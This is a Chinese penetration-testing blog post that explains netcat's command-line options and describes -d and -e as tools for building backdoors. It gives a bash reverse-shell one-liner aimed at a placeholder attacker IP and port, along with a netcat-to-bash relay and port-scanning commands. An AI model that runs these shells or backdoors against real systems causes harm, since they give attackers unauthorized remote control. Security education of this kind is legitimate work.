netcat命令及解释

作为web渗透中的扛把子工具,我们必须掌握灵活使用它,下面我们来了解一下它的命令吧!

netcat

u=1439963218,2940044238&fm=26&gp=0.gif

-d

表示脱离命令窗口,在后台运行,常用于后门建立过程

假设监听了一个端口,但是关闭了那个cmd窗口那么nc就不会监听了,加入了-d就会在后台运行

-e

执行某个程序,常用于后门建立过程(cmd. exe、/bin/bash)

-G gateway

设置网关,常用于突破内网限制

-g num

路由跳数

-i sec

设置发送每一行数据的时间间隔(以秒计算)

-l

设置netcat处于监听状太等待连接

-L

设置netcat处于昕状态等待连接,当客户端端口,服务端依旧回到等待状

-n

设置netcar只扫描ip不进行DNS解析

-o file

设置传输十六进制的数据

-p port

设置本地监听的端口了

-r

设置netcat随机化的端口号

-s addr

设置netcat源地址(用于端口扫描上)

-t

回复telnet的请求数据包

-u

设置netcat使用UDP模式(默认是使用TCP协议)

-v

显示详细信息

-w secs

设置连接超时秒数

-z

设置扫描模式,表示发送的数据包中不包含任何payload

服务器(linux)没有netcat,使用bash -i >& /dev/tcp/攻击者ip/攻击者port 0>&1 反弹shell(0表示输入,1表示输出)

nc -nvz ip port扫描端口开放情况

echo "" | nc -vn ip port    显示banner信息

客户端开两个端口,一个输入一个输出

服务器端nc ip 入port | /bin/bash | nc ip 出port 


扫描二维码推送至手机访问。

版权声明:本文由零零博客发布,如需转载请注明出处。

相关文章

web缓存欺骗和web缓存投毒攻击方式

web缓存欺骗和web缓存投毒攻击方式

 首先我们先来了解一下什么是缓存,缓存在什么地方关于缓存由于现在网站应用的复杂性,通常一个首页就会进行大量资源的加载,为了使用户更快的加载网页,几乎都会使用缓存,即将一些常用的静态文件,存储...

web信息收集

web信息收集

收集域名信息Whois查询通过在线网站:站长之家域名WHOIS信息查询地址    http://whois.chinaz.com/爱站网域名WHOIS信息查询地址   &...

优秀渗透工具资源整理

优秀渗透工具资源整理

在进行渗透测试的过程中,会用到大量的开源工具,每次在各种网站、论坛看到很多很好的工具,所以使用该文章将每次碰到的优秀工具记录下来,然后在后期在进行归纳整理,既方便他人,也方便自己。好用工具1、B-XS...

漏洞挖掘 | 记一次越权登录

漏洞挖掘 | 记一次越权登录

http://xxxxx/index.html?userNo=xxxx可以直接登录学生用户(女朋友给的)fofa收集了一波4个站点。。。,由于没扫到备份,只能黑盒测了然后发现一处接口 杂七杂八测试了下...

渗透测试常用poc,工具集合

渗透测试常用poc,工具集合

IOT Device天翼创维awifi路由器存在多处未授权访问漏洞华为WS331a产品管理页面存在CSRF漏洞CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞Web APP致远...

网络渗透方向怎么学呢?

网络渗透方向怎么学呢?

很多朋友问我,想搞网络安全,编程重要吗,选什么语言呢? 国内其实正经开设网络安全专业的学校很少,大部分同学是来自计算机科学、网络工程、软件工程专业的,甚至很多非计算机专业自学的。因此不像这三...